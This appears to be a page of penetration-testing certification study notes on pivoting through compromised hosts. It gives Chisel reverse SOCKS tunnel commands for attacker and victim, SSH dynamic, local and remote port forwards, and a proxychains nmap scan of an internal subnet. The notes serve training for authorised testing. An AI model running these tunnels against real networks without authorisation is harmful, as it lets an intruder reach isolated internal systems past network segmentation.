Pivoting, Tunnels & Lateral Movement
Deep network pivoting: Ligolo-ng TUN routing, Chisel SOCKS5 reverse proxies, SSH port forwarding, and Proxychains routing.
ligolo-ngchiselsshproxychainssocat
In multi-tiered networks, compromised dual-homed hosts act as pivot jumpboxes into isolated internal subnets.
1. Chisel Reverse SOCKS Tunnel
- Attacker Server:
./chisel server -p 8000 --reverse
- Victim Client:
./chisel client {LHOST}:8000 R:socks
2. SSH Port Forwarding
- Dynamic SOCKS5 Proxy (-D):
ssh -D 1080 -f -C -q -N {USER}@{TARGET_IP}
- Local Port Forward (-L):
ssh -L 9999:127.0.0.1:8443 {USER}@{TARGET_IP} -N
- Remote Port Forward (-R):
ssh -R {LPORT}:127.0.0.1:80 {USER}@{LHOST} -N
3. Proxychains Scanning
Route tools through configured SOCKS5 proxy:
proxychains4 -q nmap -sT -Pn -p 21,22,80,445,3389 172.16.1.10
Stage tunnel binaries using 11. Offensive File Transfers Across Restricted Networks.
More CPTS notes
- 01. Network Discovery & Port Scanning Guide
- 02. Web Content Discovery & Directory Fuzzing
- 03. Web Application Exploitation & Injection
- 04. Linux Privilege Escalation Master Guide
- 05. Windows Local Privilege Escalation & LOLBAS
- 06. Active Directory Attack Paths & Domain Enumeration
- 07. Kerberos Exploitation: AS-REP & Kerberoasting
- 08. Active Directory Certificate Services (AD CS) Abuse
- 10. Password Cracking & Hash Identification
- 11. Offensive File Transfers Across Restricted Networks
- 12. Interactive TTY Stabilization & Terminal Spawning
Keep these notes in your own private vault. Open CPTS notes in ZeroBox